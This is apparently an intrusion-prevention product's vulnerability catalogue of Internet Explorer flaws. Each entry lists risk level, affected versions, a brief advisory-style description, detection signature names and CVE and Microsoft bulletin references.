Risk:

Moderate

First detected in:

sgpkg-ips-863-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

A privilege escalation vulnerability in Microsoft Internet Explorer.

Situation:

File-Text_Internet-Explorer-CVE-2017-0037

References:

CVE-2017-0037
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0037

MS17-006
http://technet.microsoft.com/security/bulletin/MS17-006

Microsoft-Internet-Explorer-CVE-2017-0154

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-863-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

A privilege escalation vulnerability in Microsoft Internet Explorer.

Situation:

File-Text_Internet-Explorer-CVE-2017-0154

References:

CVE-2017-0154
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0154

MS17-006
http://technet.microsoft.com/security/bulletin/MS17-006

Microsoft-Internet-Explorer-CVE-2018-8629

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-1119-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0

Type:

Buffer Overflow

Description:

A heap buffer overflow vulnerability exists in Microsoft Internet Explorer. This vulnerability is due to an error while handling certain objects when processing HTML and script code. A remote attacker could exploit this vulnerability by enticing the target user to open a specially crafted web page or document. Successful exploitation, in the worst case, could lead to arbitrary code execution in the security context of the target user.

Situation:

File-Text_Microsoft-Internet-Explorer-CVE-2018-8631

References:

CVE-2018-8631
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8631

Microsoft-Internet-Explorer-CWigglyShape-Information-Disclosure

About this vulnerability:

A Microsoft Internet Explorer CWigglyShape Information Disclosure vulnerability

Risk:

High

First detected in:

sgpkg-ips-838-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 9.0;Internet Explorer 10.0;Internet Explorer 11.0

Type:

Malfunction

Description:

A vulnerability in Microsoft Internet Explorer, versions 9, 10, and 11, which allows remote attackers to disclose information that can be used to circumvent Address Space Layout Randomization in Windows, due to the improper access of objects in memory.

Situation:

File-Text_Microsoft-Internet-Explorer-CWigglyShape-Information-Disclosure

References:

CVE-2016-7283
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7283

Microsoft-Internet-Explorer-Deflate-Encoding-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-377-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

A memory corruption vulnerability exists in Microsoft Internet Explorer.

Situation:

HTTP_SS-Microsoft-Internet-Explorer-Deflate-Encoding-Memory-Corruption
HTTP_SHS-Microsoft-Internet-Explorer-Deflate-Encoding-Memory-Corruption

References:

CVE-2009-1547
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1547

BID-36622
http://www.securityfocus.com/bid/36622

MS09-054
http://technet.microsoft.com/security/bulletin/MS09-054

Microsoft-Internet-Explorer-Deleted-Data-Source-Object-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-410-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

A memory corruption vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to an error when accessing an XML Data Source Object that has not been deleted properly. A remote attacker can exploit this vulnerability by enticing a target user to open a maliciously crafted HTML document. In a sophisticated attack where code injection is successful, the behaviour of the target host is entirely dependent on the intended function of the injected code. The injected code, in this case, would execute within the security context of the currently logged in user. If such an attack is not executed successfully, the vulnerable application may terminate abnormally.

Situation:

File-Text_Internet-Explorer-Deleted-Data-Source-Object-Memory-Corruption

References:

CVE-2011-0035
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0035

BID-46157
http://www.securityfocus.com/bid/46157

OSVDB-70831
http://www.osvdb.org/70831

MS11-003
http://technet.microsoft.com/security/bulletin/MS11-003

Microsoft-Internet-Explorer-Developer-Toolbar-CVE-2012-1874

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-457-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 9.0; Internet Explorer 8.0

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-Developer-Toolbar-CVE-2012-1874

References:

CVE-2012-1874
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1874

MS12-037
http://technet.microsoft.com/security/bulletin/MS12-037

Microsoft-Internet-Explorer-Developer-Toolbar-Use-After-Free

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-847-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 8.0; Internet Explorer 9.0

Type:

Malfunction

Description:

There exists a remote code execution vulnerability in Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-Developer-Toolbar-Use-After-Free

References:

CVE-2012-1874
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1874

OSVDB-82864
http://www.osvdb.org/82864

MS12-037
http://technet.microsoft.com/security/bulletin/MS12-037

Microsoft-Internet-Explorer-Developer-Tools-CVE-2010-0811

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-386-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows Vista; Windows XP; Windows 2003; Windows 2008; Windows 7; Windows 2008 R2

Software:

Internet Explorer 8.0

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Internet Explorer.

Situation:

HTTP_SS-Microsoft-Internet-Explorer-Developer-Tools-CVE-2011-0811
File-Text_Microsoft-Internet-Explorer-Developer-Tools-CVE-2011-0811

References:

CVE-2010-0811
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0811

MS11-027
http://technet.microsoft.com/security/bulletin/MS11-027

Microsoft-Internet-Explorer-DHTML-CreateControlRange-Code-Execution

About this vulnerability:

A code execution vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-133-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Internet Explorer. The flaw is due to improper validation with buffers when handling specific DHTML methods. This allows code execution in the context of the current user.

Situation:

HTTP_SS-Microsoft-Internet-Explorer-DHTML-CreateControlRange-Code-Execution
File-Text_Microsoft-Internet-Explorer-DHTML-CreateControlRange-Code-Execution

References:

CVE-2005-0555
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0555

BID-12427
http://www.securityfocus.com/bid/12427

MS05-014
http://technet.microsoft.com/security/bulletin/MS05-014

Microsoft-Internet-Explorer-DHTML-Edit-Control-Cross-Site-Scripting

About this vulnerability:

A cross-site scripting vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-188-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Cross-site Scripting

Description:

There is a cross-site scripting vulnerability in Microsoft Internet Explorer. The DHTML Edit Control ActiveX control in Internet Explorer does not enforce the same origin policy for the scripts it executes. This may allow arbitrary code execution in the context of the current user.

Situation:

HTTP_SS-Microsoft-Internet-Explorer-DHTML-Edit-Control-Cross-Site-Scripting
File-Text_Microsoft-Internet-Explorer-DHTML-Edit-Control-Cross-Site-Scripting

References:

CVE-2004-1319
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1319

BID-11950
http://www.securityfocus.com/bid/11950

MS05-013
http://technet.microsoft.com/security/bulletin/MS05-013

Microsoft-Internet-Explorer-DHTML-Objects-Memory-Corruption

About this vulnerability:

A memory corruption vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-136-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Microsoft Internet Explorer. The vulnerability is due to the way Internet Explorer handles the switching of page location. Remote attackers can exploit this vulnerability by persuading target users to visit a specially crafted web page. Successful exploitation may allow the attacker to execute arbitrary code on the vulnerable client system in the context of the logged in user.

Situation:

HTTP_SS-Microsoft-Internet-Explorer-DHTML-Objects-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-DHTML-Objects-Memory-Corruption

References:

CVE-2007-5347
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5347

BID-26427
http://www.securityfocus.com/bid/26427

MS07-069
http://technet.microsoft.com/security/bulletin/MS07-069

Microsoft-Internet-Explorer-DOM-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-415-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Microsoft Internet Explorer. The vulnerability is due to an error in the handling of certain DOM objects. A remote attacker can exploit this vulnerability by enticing a target user to open a maliciously crafted HTML document. In a sophisticated attack where code injection is successful, the behavior of the target host depends on the intended function of the injected code. The injected code is executes in the security context of the currently logged in user. In an unsucessful attack, the vulnerable application may terminate abnormally.

Situation:

File-Text_Microsoft-Internet-Explorer-DOM-Memory-Corruption

References:

CVE-2010-1259
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1259

BID-40410
http://www.securityfocus.com/bid/40410

OSVDB-65215
http://www.osvdb.org/65215

MS10-035
http://technet.microsoft.com/security/bulletin/MS10-035

Microsoft-Internet-Explorer-DOM-Memory-Corruption-CVE-2011-1251

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-396-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows XP; Windows 2003; Windows Vista; Windows 2008; Windows 7; Windows 2008 R2

Software:

Internet Explorer 8.0

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Internet Explorer.

Situation:

HTTP_SS-Microsoft-Internet-Explorer-DOM-Memory-Corruption-CVE-2011-1251
File-Text_Microsoft-Internet-Explorer-DOM-Memory-Corruption-CVE-2011-1251

References:

CVE-2011-1251
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1251

MS11-050
http://technet.microsoft.com/security/bulletin/MS11-050

Microsoft-Internet-Explorer-DOM-Mergeattributes-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-411-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

A memory corruption vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to insufficient input validation in the DOM mergeAttributes script method. A remote attacker can exploit this vulnerability by enticing a target user to open a maliciously crafted HTML document. In a sophisticated attack where code injection is successful, the behaviour of the target host is entirely dependent on the intended function of the injected code. The injected code, in this case, would execute within the security context of the currently logged in user. If such an attack is not executed successfully, the vulnerable application may terminate abnormally.

Situation:

File-Text_Microsoft-Internet-Explorer-DOM-Mergeattributes-Memory-DOS
File-Text_Microsoft-Internet-Explorer-DOM-Mergeattributes-Memory-Corruption

References:

CVE-2010-0247
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0247

MS10-002
http://technet.microsoft.com/security/bulletin/MS10-002

Microsoft-Internet-Explorer-Drag-And-Drop-CVE-2011-1254

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-396-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows XP; Windows 2003; Windows Vista; Windows 2008; Windows 7; Windows 2008 R2

Software:

Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Internet Explorer.

Situation:

HTTP_SS-Microsoft-Internet-Explorer-Drag-And-Drop-CVE-2011-1254
File-Text_Microsoft-Internet-Explorer-Drag-And-Drop-CVE-2011-1254

References:

CVE-2011-1254
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1254

MS11-050
http://technet.microsoft.com/security/bulletin/MS11-050

Microsoft-Internet-Explorer-Ebcrypt-ActiveX-Denial-of-Service

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-582-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Input Validation

Description:

There is a denial of service flaw in the EBCrypt ActiveX control.

Situation:

File-Text_Microsoft-Internet-Explorer-Ebcrypt-ActiveX-Denial-of-Service

References:

CVE-2007-5110
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5110

BID-25787
http://www.securityfocus.com/bid/25787

OSVDB-37736
http://www.osvdb.org/37736

Microsoft-Internet-Explorer-Embed-Element-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-246-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

A memory corruption vulnerability exists in Microsoft Internet Explorer. The flaw is due to a race condition when processing malicious script that manipulates the EMBED element. An attacker can persuade the target user to open a malicious web page to exploit this vulnerability. In an attack scenario, where arbitrary code is injected and executed on the target system, the behaviour of the target is dependent on the intention of the malicious code. The injected code will be run with privileges of the currently logged on user. If such an attack is not executed successfully, the vulnerable application may terminate as a result of invalid memory access.

Situation:

HTTP_SS-Microsoft-Internet-Explorer-Embed-Element-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-Embed-Element-Memory-Corruption

References:

CVE-2009-0553
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0553

BID-34424
http://www.securityfocus.com/bid/34424

OSVDB-53626
http://www.osvdb.org/53626

MS09-014
http://technet.microsoft.com/security/bulletin/MS09-014

Microsoft-Internet-Explorer-EUC-JP-Character-Encoding-Universal-XSS

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-539-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 6.0;Internet Explorer 7.0;Internet Explorer 8.0;Internet Explorer 9.0;Internet Explorer 10.0

Type:

Input Validation

Description:

A universal cross site scripting vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to the way that IE handles EUC-JP character encoding. A remote attacker could exploit this vulnerability by submitting specially crafted HTML code into a target web site that uses EUC-JP character encoding, such as a web forum or social networking site. In the case of successful exploitation, arbitrary attacker code would run in the target users' browsers in the security context of the affected web site.

Situation:

File-Text_Internet-Explorer-EUC-JP-Character-Encoding-Universal-XSS

References:

CVE-2013-3192
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3192

BID-61664
http://www.securityfocus.com/bid/61664

OSVDB-96192
http://www.osvdb.org/96192

MS13-059
http://technet.microsoft.com/security/bulletin/MS13-059

Microsoft-Internet-Explorer-Event-Handler-Use-After-Free

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-687-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 6.0

Type:

Malfunction

Description:

There exists a use-after-free vulnerability in Internet Explorer. An exploitation can lead to execution of arbitrary code in the security context of the target user.

Situation:

File-Text_Microsoft-Internet-Explorer-Event-Handler-Use-After-Free

References:

CVE-2011-1997
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1997

BID-49962
http://www.securityfocus.com/bid/49962

OSVDB-76209
http://www.osvdb.org/76209

MS11-081
http://technet.microsoft.com/security/bulletin/MS11-081

Microsoft-Internet-Explorer-Event-Listener-Use-After-Free

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-480-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-Event-Listener-Use-After-Free

References:

CVE-2012-2546
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2546

BID-55645
http://www.securityfocus.com/bid/55645

MS12-063
http://technet.microsoft.com/security/bulletin/MS12-063

Microsoft-Internet-Explorer-execCommand-File-Type-Spoofing

About this vulnerability:	A vulnerability in Internet Explorer
Risk:	High
First detected in:	sgpkg-ips-410-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Internet Explorer
Type:	Input Validation
Description:	A vulnerability exists in Microsoft Internet Explorer when the script command execCommand is used to save a document. A specially crafted filename will be displayed as another file type. An attacker can exploit this vulnerability to save code to the target system with the extension of an executable program (e.g. .js file) by tricking a user into believing that he is saving a non-executable file (e.g., .html file).
Situation:	File-Text_Microsoft-Internet-Explorer-execCommand-File-Type-Spoofing

Microsoft-Internet-Explorer-FTP-Client-Directory-Traversal

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-426-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Internet Explorer

Type:

Directory Traversal

Description:

There is a vulnerability in the way Microsoft Internet Explorer handles filenames downloaded via the FTP protocol. Insufficient input validation can allow for the creation of a file in an arbitrary location on the client filesystem. Exploitation of this vulnerability allows an attacker to modify the local content of a target system, potentially resulting in the execution of arbitrary code with the security context of the currently logged in user. If the user uses the "Copy to folder..." method to save the specially crafted file, a "Browse for folder" dialog prompts the user to specify the destination folder. This is normal behaviour for the affected products. If the user uses the "copy and paste" or "drag and drop" method, then no additional user prompts are made. The directory traversal may be visible to the user. However, this may be hidden by using a filename that starts with other characters such as a large number of spaces. In the case of a successful attack, the target will not exhibit any unusual behaviour before or during the malicious file download.

Situation:

Generic_CS-Microsoft-Internet-Explorer-FTP-Client-Directory-Traversal
FTP_CS-Retr-Directory-Traversal

References:

CVE-2004-1376
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1376

BID-12160
http://www.securityfocus.com/bid/12160

Microsoft-Internet-Explorer-FTP-Command-Injection

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-410-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Code Injection

Description:

A vulnerability exists in the way Microsoft Internet Explorer handles URLs using the ftp:// scheme. Insufficient input validation can allow FTP command injection using such URLs. An attacker exploiting this vulnerability can supply commands that will be executed on an FTP server within the security context of the credentials supplied by the user.

Situation:

File-Text_Microsoft-Internet-Explorer-FTP-Command-Injection

References:

BID-11826
http://www.securityfocus.com/bid/11826

Microsoft-Internet-Explorer-Hhctrl.ocx-Image-Property-Heap-Corruption

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-368-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 6.0

Type:

Buffer Overflow

Description:

There exists a heap memory corruption vulnerability in the Microsoft Internet Explorer browser. The flaw is caused by an improper check during processing of a specially crafted Image property of a specific HTML Help Control ActiveX Object. An attacker can exploit this vulnerability to inject and execute arbitrary code in the security context of the currently logged in user. Upon an attack where code execution is unsuccessful, the affected browser will terminate. The behaviour of the host system after an attack attempt resulting in arbitrary code injection and its subsequent execution is dependent on the intention of the injected code. The injected code will be run in the security context of the currently logged in user.

Situation:

HTTP_SS-Microsoft-Internet-Explorer-Hhctrl.ocx-Image-Property-Heap-Corruption
File-Text_Microsoft-Internet-Explorer-Hhctrl.ocx-Image-Property-Heap-Corruption

References:

CVE-2006-3357
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3357

BID-18769
http://www.securityfocus.com/bid/18769

OSVDB-26835
http://www.osvdb.org/26835

MS06-046
http://technet.microsoft.com/security/bulletin/MS06-046

Microsoft-Internet-Explorer-History.go-Method-Double-Free-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-246-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

A memory corruption vulnerability exists in Microsoft Internet Explorer. The flaw is due to a double-free condition when processing malicious script that manipulates the history object. An attacker can persuade the target user to open a malicious web page to exploit this vulnerability. In an attack scenario, where arbitrary code is injected and executed on the target system, the behaviour of the target is dependent on the intention of the malicious code. The injected code will be run with privileges of the currently logged on user. If such an attack is not executed successfully, the vulnerable application may terminate as a result of invalid memory access.

Situation:

HTTP_SS-Microsoft-Internet-Explorer-History.go-Method-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-History.go-Method-Memory-Corruption

References:

CVE-2009-0552
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0552

BID-34423
http://www.securityfocus.com/bid/34423

OSVDB-53625
http://www.osvdb.org/53625

MS09-014
http://technet.microsoft.com/security/bulletin/MS09-014

Microsoft-Internet-Explorer-HTML-Attribute-Handling-Memory-Corruption

About this vulnerability:

A memory corruption vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-176-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Microsoft Internet Explorer. The vulnerability is due to insufficient validation of HTML tags, which leads to memory corruption. Remote attackers can exploit this vulnerability by persuading a target user to visit a specially-crafted web page. Successful exploitation causes memory corruption that can lead to arbitrary code execution in the security context of the logged in user.

Situation:

HTTP_SS-Microsoft-Internet-Explorer-HTML-Attribute-Handling-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-HTML-Attribute-Handling-Memory-Corruption

References:

CVE-2008-3476
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3476

BID-31618
http://www.securityfocus.com/bid/31618

MS08-058
http://technet.microsoft.com/security/bulletin/MS08-058

Microsoft-Internet-Explorer-HTML-Element-Memory-Corruption-CVE-2010-3345

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-362-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 8.0

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Internet Explorer.

Situation:

HTTP_SS-Microsoft-Internet-Explorer-HTML-Element-Memory-Corruption-CVE-2010-3345
File-Text_Microsoft-Internet-Explorer-HTML-Element-CVE-2010-3345

References:

CVE-2010-3345
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3345

MS10-090
http://technet.microsoft.com/security/bulletin/MS10-090

Microsoft-Internet-Explorer-HTML-Embed-Tag-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-191-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 5.0; Internet Explorer 6.0; Internet Explorer 7.0

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Microsoft Internet Explorer. There is insufficient boundary checking when handling overly long SRC attributes in an HTML embed tag. A remote attacker can exploit this vulnerability by enticing the target user to open a malicious HTML document. Successful attack can allow arbitrary code injection and execution with privileges of the currently logged on user.

Situation:

HTTP_SS-Microsoft-Internet-Explorer-HTML-Embed-Tag-Stack-Buffer-Overflow
File-Text_Microsoft-Internet-Explorer-HTML-Embed-Tag-Stack-Buffer-Overflow

References:

CVE-2008-4261
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4261

MS08-073
http://technet.microsoft.com/security/bulletin/MS08-073

Microsoft-Internet-Explorer-HTML-Embedded-In-Xml-Memory-Corruption

About this vulnerability:

Memory corruption vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-193-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Internet Explorer 6.0; Internet Explorer 7.0

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Microsoft Internet Explorer web browser. The browser does not handle HTML embedded into XML documents correctly. A remote attacker may use a crafted web page to execute arbitrary code in the context of the current user.

Situation:

HTTP_SS-Microsoft-Internet-Explorer-HTML-Embedded-In-Xml-Memory-Corruption
HTTP_SS-Microsoft-Internet-Explorer-Datasource-Xml-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-Datasource-Xml-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-HTML-Embedded-In-Xml-Memory-Corruption

References:

CVE-2008-4844
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4844

BID-32721
http://www.securityfocus.com/bid/32721

MS08-078
http://technet.microsoft.com/security/bulletin/MS08-078

Microsoft-Internet-Explorer-HTML-Help-Remote-Code-Execution

About this vulnerability:

Code execution vulnerability in HTML Help ActiveX Control

Risk:

High

First detected in:

sgpkg-ips-100-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Javascript Injection

Description:

There is a vulnerability in the way the HTML Help ActiveX control processes cross domain requests. A specially crafted web document can deceive Internet Explorer into executing remote code in the Local Computer security zone. An attacker can exploit this vulnerability to bypass the security zone restrictions and execute arbitrary code with the privileges of the currently logged in user.

Situation:

HTTP_Microsoft-Internet-Explorer-HTML-Help-Remote-Code-Execution
File-Text_Microsoft-Internet-Explorer-HTML-Help-Remote-Code-Execution

References:

CVE-2004-1043
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1043

MS05-001
http://technet.microsoft.com/security/bulletin/MS05-001

Microsoft-Internet-Explorer-HTML-Layout-CVE-2012-0011

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-440-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-HTML-Layout-CVE-2012-0011

References:

CVE-2012-0011
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0011

MS12-010
http://technet.microsoft.com/security/bulletin/MS12-010

Microsoft-Internet-Explorer-HTML-Layout-Memory-Corruption-CVE-2010-2560

About this vulnerability:

A memory corruption vulnerability in Microsoft Internet Explorer

Risk:

Critical

First detected in:

sgpkg-ips-329-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

Situation:

HTTP_SS-Microsoft-Internet-Explorer-HTML-Layout-Memory-Corruption-CVE-2010-2560
File-Text_Microsoft-Internet-Explorer-HTML-Layout-CVE-2010-2560

References:

CVE-2010-2560
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2560

MS10-053
http://technet.microsoft.com/security/bulletin/MS10-053

Microsoft-Internet-Explorer-HTML-Layout-Use-After-Free

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-826-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0

Type:

Malfunction

Description:

There exists a use-after-free vulnerability in Microsoft Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-HTML-Layout-Use-After-Free

References:

CVE-2012-0011
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0011

MS12-010
http://technet.microsoft.com/security/bulletin/MS12-010

Microsoft-Internet-Explorer-HTML-Object-Memory-Corruption-CVE-2010-0248

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-279-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2000; Windows XP; Windows 2003; Windows Vista; Windows 2008; Windows 7

Software:

Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0

Type:

Input Validation

Description:

A memory corruption vulnerability exists in Microsoft Internet Explorer. The vulnerability is due an error in the handling of deleted HTML table objects, allowing the use of a pointer even after it has been freed. A remote attacker can exploit this vulnerability by enticing a target user to open a maliciously crafted HTML document. In a sophisticated attack where code injection is successful, the behaviour of the target host is entirely dependent on the intended function of the injected code. The injected code, in this case, would execute within the security context of the currently logged in user.

Situation:

HTTP_SS-Microsoft-Internet-Explorer-HTML-Object-Memory-Corruption-CVE-2010-0248
File-Text_Microsoft-Internet-Explorer-HTML-Object-CVE-2010-0248

References:

CVE-2010-0248
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0248

MS10-002
http://technet.microsoft.com/security/bulletin/MS10-002

Microsoft-Internet-Explorer-HTML-Object-Memory-Corruption-CVE-2010-3340

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-362-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 6.0; Internet Explorer 7.0

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Internet Explorer.

Situation:

HTTP_SS-Microsoft-Internet-Explorer-HTML-Object-Memory-Corruption-CVE-2010-3340
File-Text_Microsoft-Internet-Explorer-HTML-Object-CVE-2010-3340

References:

CVE-2010-3340
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3340

MS10-090
http://technet.microsoft.com/security/bulletin/MS10-090

